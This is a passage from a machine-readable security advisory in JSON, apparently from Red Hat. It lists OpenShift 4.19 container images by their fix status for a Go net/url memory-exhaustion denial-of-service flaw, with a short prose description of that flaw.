"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
